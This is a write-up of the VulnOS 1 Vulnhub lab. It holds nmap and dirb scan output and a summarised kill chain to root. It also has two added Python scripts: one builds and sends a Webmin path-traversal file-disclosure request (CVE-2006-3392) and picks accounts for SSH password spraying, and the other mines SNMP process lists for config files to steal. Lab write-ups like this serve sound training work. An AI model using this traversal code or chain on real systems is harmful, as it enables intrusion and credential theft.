This post describes the steps needed to gain root on VulnOS 1, available on Vulnhub (https://www.vulnhub.com/). The goal of this box, according to the author c4b3rw0lf (https://twitter.com/c4b3rw0lf), is to get root and find all the vulnerabilities inside the OS.
Machine Name: VulnOS: 1
Resource URL: https://www.vulnhub.com/entry/vulnos-1,60/
Release Date: 22 Mar 2014
Summary
To obtain administrative access on this box, the following kill chain was executed.
- Enumeration of open TCP ports and services.
- Detection of an Arbitrary File Disclosure vulnerability in MiniServ (Webmin), for which a public exploit exists ( https://www.exploit-db.com/exploits/2017 ).
- Enumeration of open UDP ports and services, including the SNMP service and the data it exposes through its default community string.
- phpMyAdmin with default credentials allowed the attacker to access the databases and obtain password hashes.
- Cracking the hash of the Drupal 6 user and gaining administrative access to the Drupal 6 management console.
- Arbitrary file upload in the Drupal 6 platform after the attacker extended the list of allowed file extensions. The uploaded file gives the attacker a shell on the system.
- Using the credential found in /etc/ldap.secret, the attacker ran a password-spraying attack against the SSH service with the usernames from /etc/passwd. The attack revealed a valid credential for the user vulnosadmin.
- sudo is enabled for vulnosadmin without restrictions on the commands it can run, allowing the attacker to get root.
Another way to get administrative access on the machine is:
- Locate the distccd service and exploit it ( https://www.rapid7.com/db/modules/exploit/unix/misc/distcc_exec ) to gain an unprivileged shell on the target.
- Identify that MiniServ 0.01 runs with root privileges. The attacker uses the path traversal behind the Arbitrary File Disclosure to make the application execute a CGI script; when the script runs, the attacker receives a shell with root privileges.
WriteUp
Recon
During the recon step, the port scanner nmap was used to enumerate open TCP ports and services. Multiple services were detected running on the target.
# Nmap 7.60 scan initiated Sun Feb 9 13:11:19 2020 as: nmap -sS -sV -sC -oN nmap_scan -v --mtu 64 192.168.1.114
Nmap scan report for VulnOS.lan (192.168.1.114)
Host is up (0.0053s latency).
Not shown: 977 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.3p1 Debian 3ubuntu7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 43:a6:84:8d:be:1a:ee:fb:ed:c3:23:53:14:14:8f:50 (DSA)
|_ 2048 30:1d:2d:c4:9e:66:d8:bd:70:7c:48:84:fb:b9:7b:09 (RSA)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
|_smtp-commands: VulnOS.home, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
| ssl-cert: Subject: commonName=VulnOS.home
| Issuer: commonName=VulnOS.home
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2014-03-09T14:00:56
| Not valid after: 2024-03-06T14:00:56
| MD5: fab2 dc38 f81d 7da1 474f 7327 417b 60ed
|_SHA-1: c182 f6e0 08cd 690a ad74 42c2 efaf ed7d 78c8 2b92
|_ssl-date: 2020-02-09T16:10:36+00:00; -1m42s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_RC4_128_WITH_MD5
| SSL2_RC4_128_EXPORT40_WITH_MD5
| SSL2_RC2_128_CBC_WITH_MD5
| SSL2_DES_64_CBC_WITH_MD5
|_ SSL2_DES_192_EDE3_CBC_WITH_MD5
53/tcp open domain ISC BIND 9.7.0-P1
| dns-nsid:
|_ bind.version: 9.7.0-P1
80/tcp open http Apache httpd 2.2.14 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.14 (Ubuntu)
|_http-title: index
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: SASL CAPA STLS UIDL RESP-CODES TOP PIPELINING
| ssl-cert: Subject: commonName=VulnOS.home
| Issuer: commonName=VulnOS.home
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2014-03-09T14:00:56
| Not valid after: 2024-03-06T14:00:56
| MD5: fab2 dc38 f81d 7da1 474f 7327 417b 60ed
|_SHA-1: c182 f6e0 08cd 690a ad74 42c2 efaf ed7d 78c8 2b92
|_ssl-date: 2020-02-09T16:10:34+00:00; -1m43s from scanner time.
| sslv2:
| SSLv2 supported
|_ ciphers: none
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/udp nfs
| 100005 1,2,3 48199/udp mountd
| 100005 1,2,3 57799/tcp mountd
| 100021 1,3,4 58737/udp nlockmgr
| 100021 1,3,4 59441/tcp nlockmgr
| 100024 1 35903/tcp status
|_ 100024 1 37113/udp status
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
|_imap-capabilities: LIST-EXTENDED LITERAL+ SASL-IR CONDSTORE completed Capability UNSELECT ENABLE IMAP4rev1 CONTEXT=SEARCH IDLE THREAD=REFERENCES I18NLEVEL=1 LOGINDISABLEDA0001 STARTTLS OK MULTIAPPEND WITHIN SEARCHRES QRESYNC SORT=DISPLAY THREAD=REFS ID ESORT ESEARCH LOGIN-REFERRALS UIDPLUS NAMESPACE CHILDREN SORT
| ssl-cert: Subject: commonName=VulnOS.home
| Issuer: commonName=VulnOS.home
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2014-03-09T14:00:56
| Not valid after: 2024-03-06T14:00:56
| MD5: fab2 dc38 f81d 7da1 474f 7327 417b 60ed
|_SHA-1: c182 f6e0 08cd 690a ad74 42c2 efaf ed7d 78c8 2b92
|_ssl-date: 2020-02-09T16:10:35+00:00; -1m43s from scanner time.
| sslv2:
| SSLv2 supported
|_ ciphers: none
389/tcp open ldap OpenLDAP 2.2.X - 2.3.X
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
512/tcp open exec?
513/tcp open login?
514/tcp open tcpwrapped
901/tcp open http Samba SWAT administration server
| http-auth:
| HTTP/1.0 401 Authorization Required\x0D
|_ Basic realm=SWAT
| http-methods:
|_ Supported Methods: GET POST
|_http-title: 401 Authorization Required
993/tcp open ssl/imap Dovecot imapd
|_imap-capabilities: LIST-EXTENDED LITERAL+ SASL-IR CONDSTORE completed Capability UNSELECT ENABLE IMAP4rev1 OK IDLE THREAD=REFERENCES I18NLEVEL=1 AUTH=LOGINA0001 CONTEXT=SEARCH AUTH=PLAIN MULTIAPPEND WITHIN SEARCHRES QRESYNC SORT=DISPLAY THREAD=REFS ID ESORT ESEARCH LOGIN-REFERRALS UIDPLUS NAMESPACE CHILDREN SORT
| ssl-cert: Subject: commonName=VulnOS.home
| Issuer: commonName=VulnOS.home
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2014-03-09T14:00:56
| Not valid after: 2024-03-06T14:00:56
| MD5: fab2 dc38 f81d 7da1 474f 7327 417b 60ed
|_SHA-1: c182 f6e0 08cd 690a ad74 42c2 efaf ed7d 78c8 2b92
|_ssl-date: 2020-02-09T16:10:35+00:00; -1m43s from scanner time.
| sslv2:
| SSLv2 supported
|_ ciphers: none
995/tcp open ssl/pop3 Dovecot pop3d
|_pop3-capabilities: SASL(PLAIN LOGIN) CAPA RESP-CODES UIDL USER TOP PIPELINING
| ssl-cert: Subject: commonName=VulnOS.home
| Issuer: commonName=VulnOS.home
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2014-03-09T14:00:56
| Not valid after: 2024-03-06T14:00:56
| MD5: fab2 dc38 f81d 7da1 474f 7327 417b 60ed
|_SHA-1: c182 f6e0 08cd 690a ad74 42c2 efaf ed7d 78c8 2b92
|_ssl-date: 2020-02-09T16:10:34+00:00; -1m43s from scanner time.
| sslv2:
| SSLv2 supported
|_ ciphers: none
2000/tcp open sieve Dovecot timsieved
2049/tcp open nfs 2-4 (RPC #100003)
3306/tcp open mysql MySQL 5.1.73-0ubuntu0.10.04.1
| mysql-info:
| Protocol: 10
| Version: 5.1.73-0ubuntu0.10.04.1
| Thread ID: 315
| Capabilities flags: 63487
| Some Capabilities: Support41Auth, Speaks41ProtocolNew, SupportsLoadDataLocal, IgnoreSpaceBeforeParenthesis, SupportsTransactions, IgnoreSigpipes, InteractiveClient, SupportsCompression, LongColumnFlag, Speaks41ProtocolOld, FoundRows, ODBCClient, DontAllowDatabaseTableColumn, LongPassword, ConnectWithDatabase
| Status: Autocommit
|_ Salt: }R_ipx+iO1DCdN8k5e}c
6667/tcp open irc IRCnet ircd
| irc-info:
| users: 1
| servers: 1
| chans: 15
| lusers: 1
| lservers: 0
| server: irc.localhost
| version: 2.11.2p1. irc.localhost 000A
| uptime: 0 days, 2:04:48
| source ident: NONE or BLOCKED
| source host: remember.lan
|_ error: Closing Link: ffsgpdypi[~nmap@remember.lan] ("")
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
| http-methods:
| Supported Methods: GET HEAD POST PUT DELETE OPTIONS
|_ Potentially risky methods: PUT DELETE
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat
10000/tcp open http MiniServ 0.01 (Webmin httpd)
|_http-favicon: Unknown favicon MD5: 1F4BAEFFD3C738F5BEDC24B7B6B43285
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
MAC Address: 08:00:27:43:06:19 (Oracle VirtualBox virtual NIC)
Service Info: Hosts: VulnOS.home, irc.localhost; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: -1m42s, deviation: 0s, median: -1m43s
| nbstat: NetBIOS name: VULNOS, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
| VULNOS<00> Flags: <unique><active>
| VULNOS<03> Flags: <unique><active>
| VULNOS<20> Flags: <unique><active>
| \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| WORKGROUP<1d> Flags: <unique><active>
| WORKGROUP<1e> Flags: <group><active>
|_ WORKGROUP<00> Flags: <group><active>
|_smb2-time: Protocol negotiation failed (SMB2)
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Feb 9 13:13:28 2020 -- 1 IP address (1 host up) scanned in 128.96 seconds
The nmap output reveals multiple services on the target. MiniServ 0.01, running on port 10000/TCP, has an Arbitrary File Disclosure vulnerability with a public exploit (https://www.exploit-db.com/exploits/2017). The exploit allowed the attacker to read files such as /etc/passwd and /etc/shadow from the target system; being able to read /etc/shadow is already a sign that the web server runs with root privileges.
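As an added example (not the page's code and not the EDB 2017 script), the Python below builds the traversal path that exploit uses and filters the /etc/passwd it returns down to the accounts worth spraying in the SSH step later. The host and port are those from the scan above; the sample passwd content is constructed and is not the box's real file.

```python
import urllib.request

# Assumptions for this added example: the target address from the first nmap
# scan and Webmin (MiniServ) on 10000/tcp.
TARGET_HOST = "192.168.1.114"
TARGET_PORT = 10000

NO_LOGIN_SHELLS = {"false", "nologin", "sync", "halt", "shutdown"}


def webmin_path(target_path: str, depth: int = 10) -> str:
    """Build the unauthenticated traversal path from EDB 2017 (CVE-2006-3392).

    MiniServ's path sanitisation in this Webmin release mishandles the '..%01'
    sequence, so the request escapes the web root. The same path form is what
    reaches /tmp/revshell.cgi in the root-shell step: miniserv executes .cgi
    targets instead of serving their contents.
    """
    return "/unauthenticated/" + "..%01/" * depth + target_path.lstrip("/")


def fetch_file(target_path: str, host: str = TARGET_HOST, port: int = TARGET_PORT,
               timeout: float = 10.0) -> str:
    """Read one file through the disclosure bug (network call; not run offline)."""
    url = f"http://{host}:{port}{webmin_path(target_path)}"
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return resp.read().decode("utf-8", errors="replace")


def login_users(passwd_text: str) -> list:
    """Accounts worth spraying over SSH: root or a regular user (uid 1000 and
    above, below the 'nobody' range) whose shell can actually log in."""
    users = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) != 7 or not fields[2].isdigit():
            continue
        name, uid, shell = fields[0], int(fields[2]), fields[6]
        if shell.rsplit("/", 1)[-1] in NO_LOGIN_SHELLS:
            continue
        if uid == 0 or 1000 <= uid < 65534:
            users.append(name)
    return users


# Constructed sample of what the disclosure returns; not the box's real file.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
www-data:x:33:33:www-data:/var/www:/bin/sh
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
vulnosadmin:x:1000:1000:vulnosadmin,,,:/home/vulnosadmin:/bin/bash
"""

if __name__ == "__main__":
    print(webmin_path("/etc/passwd"))
    print(login_users(SAMPLE_PASSWD))
    # Live use against the box: print(fetch_file("/etc/passwd"))
```

The traversal depth only needs to be at least the depth of the Webmin root; extra `..%01/` components are harmless, which is why the public exploit hard-codes a generous number.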
A second scan was executed against UDP services. It detected that the SNMP service (https://en.wikipedia.org/wiki/Simple_Network_Management_Protocol) is running and leaking information about the target because the community string is left at its default value (public).
# Nmap 7.60 scan initiated Wed Feb 26 07:36:28 2020 as: nmap -Pn -sU -sV -sC -oN udp-scan 192.168.1.142
Nmap scan report for VulnOS.lan (192.168.1.142)
Host is up (0.0047s latency).
Not shown: 993 closed ports
PORT STATE SERVICE VERSION
68/udp open|filtered dhcpc
111/udp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/udp nfs
| 100005 1,2,3 47170/tcp mountd
| 100005 1,2,3 48269/udp mountd
| 100021 1,3,4 46204/tcp nlockmgr
| 100021 1,3,4 54221/udp nlockmgr
| 100024 1 37506/udp status
|_ 100024 1 57631/tcp status
137/udp open netbios-ns Microsoft Windows netbios-ns (workgroup: WORKGROUP)
138/udp open|filtered netbios-dgm
161/udp open snmp SNMPv1 server; net-snmp SNMPv3 server (public)
| snmp-info:
| enterprise: net-snmp
| engineIDFormat: unknown
| engineIDData: a2bd0a2e28cd1c53
| snmpEngineBoots: 29
|_ snmpEngineTime: 1h10m38s
| snmp-interfaces:
| lo
| IP address: 127.0.0.1 Netmask: 255.0.0.0
| Type: softwareLoopback Speed: 10 Mbps
| Traffic stats: 131.70 Kb sent, 131.70 Kb received
| eth0
| IP address: 192.168.1.142 Netmask: 255.255.255.0
| MAC address: 08:00:27:43:06:19 (Oracle VirtualBox virtual NIC)
| Type: ethernetCsmacd Speed: 10 Mbps
|_ Traffic stats: 590.54 Kb sent, 795.48 Kb received
| snmp-netstat:
| TCP 0.0.0.0:22 0.0.0.0:0
| TCP 0.0.0.0:23 0.0.0.0:0
| TCP 0.0.0.0:25 0.0.0.0:0
| TCP 0.0.0.0:110 0.0.0.0:0
| TCP 0.0.0.0:111 0.0.0.0:0
| TCP 0.0.0.0:143 0.0.0.0:0
| TCP 0.0.0.0:389 0.0.0.0:0
| TCP 0.0.0.0:512 0.0.0.0:0
| TCP 0.0.0.0:513 0.0.0.0:0
| TCP 0.0.0.0:514 0.0.0.0:0
| TCP 0.0.0.0:901 0.0.0.0:0
| TCP 0.0.0.0:993 0.0.0.0:0
| TCP 0.0.0.0:995 0.0.0.0:0
| TCP 0.0.0.0:2000 0.0.0.0:0
| TCP 0.0.0.0:2049 0.0.0.0:0
| TCP 0.0.0.0:3306 0.0.0.0:0
| TCP 0.0.0.0:3632 0.0.0.0:0
| TCP 0.0.0.0:6667 0.0.0.0:0
| TCP 0.0.0.0:8070 0.0.0.0:0
| TCP 0.0.0.0:10000 0.0.0.0:0
| TCP 0.0.0.0:46204 0.0.0.0:0
| TCP 0.0.0.0:47170 0.0.0.0:0
| TCP 0.0.0.0:57631 0.0.0.0:0
| TCP 127.0.0.1:53 0.0.0.0:0
| TCP 127.0.0.1:631 0.0.0.0:0
| TCP 127.0.0.1:953 0.0.0.0:0
| TCP 127.0.0.1:5432 0.0.0.0:0
| TCP 127.0.0.1:8069 0.0.0.0:0
| TCP 127.0.0.1:11211 0.0.0.0:0
| TCP 192.168.1.142:53 0.0.0.0:0
| UDP 0.0.0.0:68 *:*
| UDP 0.0.0.0:111 *:*
| UDP 0.0.0.0:137 *:*
| UDP 0.0.0.0:138 *:*
| UDP 0.0.0.0:161 *:*
| UDP 0.0.0.0:891 *:*
| UDP 0.0.0.0:2049 *:*
| UDP 0.0.0.0:10000 *:*
| UDP 0.0.0.0:35411 *:*
| UDP 0.0.0.0:37506 *:*
| UDP 0.0.0.0:48269 *:*
| UDP 0.0.0.0:54221 *:*
| UDP 127.0.0.1:53 *:*
| UDP 127.0.0.1:11211 *:*
| UDP 192.168.1.142:53 *:*
| UDP 192.168.1.142:137 *:*
|_ UDP 192.168.1.142:138 *:*
| snmp-processes:
| 1:
| Name: init
| Path: /sbin/init
| 2:
| Name: kthreadd
| 3:
| Name: migration/0
| 4:
| Name: ksoftirqd/0
| 5:
| Name: watchdog/0
| 6:
| Name: events/0
| 7:
| Name: cpuset
| 8:
| Name: khelper
| 9:
| Name: netns
| 10:
| Name: async/mgr
| 11:
| Name: pm
| 12:
| Name: sync_supers
| 13:
| Name: bdi-default
| 14:
| Name: kintegrityd/0
| 15:
| Name: kblockd/0
| 16:
| Name: kacpid
| 17:
| Name: kacpi_notify
| 18:
| Name: kacpi_hotplug
| 19:
| Name: ata/0
| 20:
| Name: ata_aux
| 21:
| Name: ksuspend_usbd
| 22:
| Name: khubd
| 23:
| Name: kseriod
| 24:
| Name: kmmcd
| 27:
| Name: khungtaskd
| 28:
| Name: kswapd0
| 29:
| Name: ksmd
| 30:
| Name: aio/0
| 31:
| Name: ecryptfs-kthrea
| 32:
| Name: crypto/0
| 37:
| Name: scsi_eh_0
| 38:
| Name: scsi_eh_1
| 40:
| Name: kstriped
| 41:
| Name: kmpathd/0
| 42:
| Name: kmpath_handlerd
| 43:
| Name: ksnapd
| 44:
| Name: kondemand/0
| 45:
| Name: kconservative/0
| 227:
| Name: scsi_eh_2
| 262:
| Name: kdmflush
| 266:
| Name: kdmflush
| 282:
| Name: usbhid_resumer
| 284:
| Name: jbd2/dm-0-8
| 285:
| Name: ext4-dio-unwrit
| 329:
| Name: upstart-udev-br
| Params: --daemon
| 331:
| Name: udevd
| Params: --daemon
| 492:
| Name: udevd
| Params: --daemon
| 498:
| Name: udevd
| Params: --daemon
| 516:
| Name: kpsmoused
| 636:
| Name: portmap
| 662:
| Name: smbd
| Params: -F
| 674:
| Name: rsyslogd
| Params: -c4
| 676:
| Name: dbus-daemon
| Params: --system --fork
| 711:
| Name: smbd
| Params: -F
| 715:
| Name: rpc.statd
| Params: -L
| 776:
| Name: flush-251:0
| 778:
| Name: getty
| Params: -8 38400 tty4
| 784:
| Name: getty
| Params: -8 38400 tty5
| 790:
| Name: getty
| Params: -8 38400 tty2
| 792:
| Name: getty
| Params: -8 38400 tty3
| 798:
| Name: getty
| Params: -8 38400 tty6
| 811:
| Name: named
| Params: -u bind
| 819:
| Name: cron
| 820:
| Name: atd
| 848:
| Name: mysqld
| 866:
| Name: postgres
| Params: -D /var/lib/postgresql/8.4/main -c config_file=/etc/postgresql/8.4/main/postgresql.conf
| 916:
| Name: postgres
| 917:
| Name: postgres
| 918:
| Name: postgres
| 919:
| Name: postgres
| 1138:
| Name: slapd
| Params: -h ldap:/// ldapi:/// -g openldap -u openldap -F /etc/ldap/slapd.d/
| 1158:
| Name: distccd
| Params: --pid-file=/var/run/distccd.pid --log-file=/var/log/distccd.log --daemon --allow 192.168.1.1/24 --listen 0.0.0.0 --nice 10 --zer
| 1168:
| Name: distccd
| Params: --pid-file=/var/run/distccd.pid --log-file=/var/log/distccd.log --daemon --allow 192.168.1.1/24 --listen 0.0.0.0 --nice 10 --zer
| 1175:
| Name: ircd
| 1178:
| Name: iauth
| 1181:
| Name: memcached
| Params: -m 64 -p 11211 -u nobody -l 127.0.0.1
| 1193:
| Name: rpciod/0
| 1230:
| Name: lockd
| 1233:
| Name: nfsd4
| 1234:
| Name: nfsd
| 1235:
| Name: nfsd
| 1237:
| Name: nfsd
| 1238:
| Name: nfsd
| 1239:
| Name: nfsd
| 1241:
| Name: nfsd
| 1242:
| Name: nfsd
| 1243:
| Name: nfsd
| 1249:
| Name: rpc.mountd
| Params: --manage-gids
| 1268:
| Name: inetd
| 1395:
| Name: master
| 1422:
| Name: snmpd
| Params: -Lsd -Lf /dev/null -u snmp -g snmp -I -smux -p /var/run/snmpd.pid -c /etc/snmp/snmpd.conf
| 1451:
| Name: python
| Params: ./openerp-server.py --config=/etc/openerp-server.conf
| 1460:
| Name: distccd
| Params: --pid-file=/var/run/distccd.pid --log-file=/var/log/distccd.log --daemon --allow 192.168.1.1/24 --listen 0.0.0.0 --nice 10 --zer
| 1471:
| Name: dovecot
| Params: -c /etc/dovecot/dovecot.conf
| 1474:
| Name: dovecot-auth
| 1482:
| Name: dovecot-auth
| Params: -w
| 1550:
| Name: nagios3
| Params: -d /etc/nagios3/nagios.cfg
| 1595:
| Name: cupsd
| Params: -C /etc/cups/cupsd.conf
| 1657:
| Name: apache2
| Params: -k start
| 1669:
| Name: apache2
| Params: -k start
| 1670:
| Name: apache2
| Params: -k start
| 1671:
| Name: apache2
| Params: -k start
| 1672:
| Name: apache2
| Params: -k start
| 1673:
| Name: apache2
| Params: -k start
| 1705:
| Name: java
| Params: -Djava.util.logging.config.file=/var/lib/tomcat6/conf/logging.properties -Djava.awt.headless=true -Xmx128M -XX:+UseConcMarkSweep
| 1742:
| Name: distccd
| Params: --pid-file=/var/run/distccd.pid --log-file=/var/log/distccd.log --daemon --allow 192.168.1.1/24 --listen 0.0.0.0 --nice 10 --zer
| 1743:
| Name: managesieve-log
| 1745:
| Name: managesieve-log
| 2098:
| Name: miniserv.pl
| Params: /var/www/webmin-1.280/miniserv.pl /etc/webmin/miniserv.conf
| 2100:
| Name: getty
| Params: -8 38400 tty1
| 2109:
| Name: dhclient3
| Params: -e IF_METRIC=100 -pf /var/run/dhclient.eth0.pid -lf /var/lib/dhcp3/dhclient.eth0.leases eth0
| 2130:
| Name: sshd
| Params: -D
| 2149:
| Name: pickup
| Params: -l -t fifo -u -c
| 2150:
| Name: qmgr
| Params: -l -t fifo -u
| 2173:
| Name: nmbd
| Params: -D
| 2757:
| Name: tlsmgr
| Params: -l -t unix -u -c
| 2928:
| Name: managesieve-log
| 2933:
| Name: apache2
| Params: -k start
| 3034:
| Name: pop3-login
| 3109:
| Name: pop3-login
| 3112:
| Name: imap-login
| 3113:
| Name: imap-login
| 3114:
| Name: imap-login
| 3115:
| Name: imap-login
| 3116:
| Name: imap-login
| 3117:
| Name: imap-login
| 3118:
| Name: imap-login
| 3119:
| Name: imap-login
| 3120:
| Name: imap-login
| 3121:
| Name: imap-login
| 3176:
|_ Name: pop3-login
| snmp-sysdescr: Linux VulnOS 2.6.32-57-generic-pae #119-Ubuntu SMP Wed Feb 19 01:20:04 UTC 2014 i686
|_ System uptime: 1h10m38.25s (423825 timeticks)
2049/udp open nfs 2-4 (RPC #100003)
10000/udp open webmin (http on TCP port 10000)
MAC Address: 08:00:27:43:06:19 (Oracle VirtualBox virtual NIC)
Service Info: Host: VULNOS; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_nbstat: NetBIOS name: VULNOS, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Feb 26 07:56:00 2020 -- 1 IP address (1 host up) scanned in 1171.40 seconds
The SNMP data allowed the attacker to combine the Arbitrary File Disclosure vulnerability with the process list collected from the SNMP server to enumerate the applications running on the target and their respective configuration files: every daemon's command line (the Params field above) names the config file it was started with.
Recon against port 80/TCP detected multiple platforms running on the same web server.
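As an added example (not the page's code), the Python below parses nmap's snmp-processes block and extracts the configuration files named on each daemon's command line, which is the list to pull through the Webmin file disclosure. The sample input is a constructed subset of the scan output above.

```python
import re

# Absolute Unix path inside a command line. The lookbehind keeps 'ldap:///',
# './script.py' and '192.168.1.1/24' from producing bogus matches.
PATH_RE = re.compile(r"(?<![\w./])/(?:[\w.+-]+/)*[\w.+-]+")
CONFIG_EXTENSIONS = (".conf", ".cfg", ".cnf", ".ini", ".properties", ".secret")


def parse_snmp_processes(nmap_text: str) -> list:
    """Turn nmap's snmp-processes block into [{'pid', 'name', 'params'}, ...]."""
    procs = []
    for raw in nmap_text.splitlines():
        line = raw.lstrip("|_ \t").rstrip()
        m = re.fullmatch(r"(\d+):", line)
        if m:
            procs.append({"pid": int(m.group(1)), "name": "", "params": ""})
        elif line.startswith("Name: ") and procs:
            procs[-1]["name"] = line[len("Name: "):]
        elif line.startswith("Params: ") and procs:
            procs[-1]["params"] = line[len("Params: "):]
    return procs


def looks_like_config(path: str) -> bool:
    """Anything under /etc or carrying a typical configuration-file extension."""
    return path.startswith("/etc/") or path.lower().endswith(CONFIG_EXTENSIONS)


def config_targets(procs: list) -> list:
    """(process name, path) pairs worth reading through the file disclosure."""
    seen, targets = set(), []
    for proc in procs:
        for path in PATH_RE.findall(proc["params"]):
            key = (proc["name"], path)
            if looks_like_config(path) and key not in seen:
                seen.add(key)
                targets.append(key)
    return targets


# Constructed subset of the nmap snmp-processes output from the scan above.
SAMPLE_SNMP = """| snmp-processes:
|   1138:
|     Name: slapd
|     Params: -h ldap:/// ldapi:/// -g openldap -u openldap -F /etc/ldap/slapd.d/
|   1158:
|     Name: distccd
|     Params: --pid-file=/var/run/distccd.pid --log-file=/var/log/distccd.log --daemon --allow 192.168.1.1/24 --listen 0.0.0.0 --nice 10
|   1422:
|     Name: snmpd
|     Params: -Lsd -Lf /dev/null -u snmp -g snmp -I -smux -p /var/run/snmpd.pid -c /etc/snmp/snmpd.conf
|   1451:
|     Name: python
|     Params: ./openerp-server.py --config=/etc/openerp-server.conf
|   1705:
|     Name: java
|     Params: -Djava.util.logging.config.file=/var/lib/tomcat6/conf/logging.properties -Djava.awt.headless=true -Xmx128M
|   2098:
|     Name: miniserv.pl
|_    Params: /var/www/webmin-1.280/miniserv.pl /etc/webmin/miniserv.conf
"""

if __name__ == "__main__":
    for name, path in config_targets(parse_snmp_processes(SAMPLE_SNMP)):
        print(f"{name:12s} {path}")
```

Feeding each path into the Webmin traversal is what turns "a process list" into credentials: /etc/webmin/miniserv.conf, /etc/snmp/snmpd.conf and the OpenERP and Tomcat configs are exactly the files that tend to hold passwords.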
OUTPUT_FILE: ../dirb_scan_80
START_TIME: Sun Feb 9 19:27:51 2020
URL_BASE: http://192.168.1.114/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.1.114/ ----
==> DIRECTORY: http://192.168.1.114/imgs/
+ http://192.168.1.114/index (CODE:200|SIZE:745)
+ http://192.168.1.114/index.html (CODE:200|SIZE:745)
+ http://192.168.1.114/index2 (CODE:200|SIZE:1066)
==> DIRECTORY: http://192.168.1.114/javascript/
==> DIRECTORY: http://192.168.1.114/mediawiki/
==> DIRECTORY: http://192.168.1.114/phpldapadmin/
==> DIRECTORY: http://192.168.1.114/phpmyadmin/
==> DIRECTORY: http://192.168.1.114/phppgadmin/
==> DIRECTORY: http://192.168.1.114/javascript/jquery/
==> DIRECTORY: http://192.168.1.114/mediawiki/config/
==> DIRECTORY: http://192.168.1.114/mediawiki/extensions/
==> DIRECTORY: http://192.168.1.114/mediawiki/images/
==> DIRECTORY: http://192.168.1.114/mediawiki/skins/
==> DIRECTORY: http://192.168.1.114/phpldapadmin/css/
==> DIRECTORY: http://192.168.1.114/phpldapadmin/images/
+ http://192.168.1.114/phpldapadmin/index.php (CODE:200|SIZE:4731)
==> DIRECTORY: http://192.168.1.114/phpldapadmin/js/
==> DIRECTORY: http://192.168.1.114/phpmyadmin/js/
==> DIRECTORY: http://192.168.1.114/phpmyadmin/lang/
==> DIRECTORY: http://192.168.1.114/phpmyadmin/themes/
==> DIRECTORY: http://192.168.1.114/phppgadmin/classes/
==> DIRECTORY: http://192.168.1.114/phppgadmin/conf/
==> DIRECTORY: http://192.168.1.114/phppgadmin/help/
==> DIRECTORY: http://192.168.1.114/phppgadmin/images/
==> DIRECTORY: http://192.168.1.114/phppgadmin/lang/
==> DIRECTORY: http://192.168.1.114/phppgadmin/libraries/
+ http://192.168.1.114/phppgadmin/robots.txt (CODE:200|SIZE:221)
==> DIRECTORY: http://192.168.1.114/phppgadmin/sql/
==> DIRECTORY: http://192.168.1.114/phppgadmin/themes/
==> DIRECTORY: http://192.168.1.114/mediawiki/skins/common/
==> DIRECTORY: http://192.168.1.114/mediawiki/skins/disabled/
==> DIRECTORY: http://192.168.1.114/mediawiki/skins/simple/
==> DIRECTORY: http://192.168.1.114/phpldapadmin/css/default/
==> DIRECTORY: http://192.168.1.114/phpldapadmin/images/default/
==> DIRECTORY: http://192.168.1.114/phpmyadmin/themes/original/
==> DIRECTORY: http://192.168.1.114/phppgadmin/classes/database/
==> DIRECTORY: http://192.168.1.114/phppgadmin/classes/plugins/
==> DIRECTORY: http://192.168.1.114/phppgadmin/images/themes/
==> DIRECTORY: http://192.168.1.114/phppgadmin/libraries/adodb/
==> DIRECTORY: http://192.168.1.114/phppgadmin/themes/default/
==> DIRECTORY: http://192.168.1.114/mediawiki/skins/common/images/
==> DIRECTORY: http://192.168.1.114/phpmyadmin/themes/original/css/
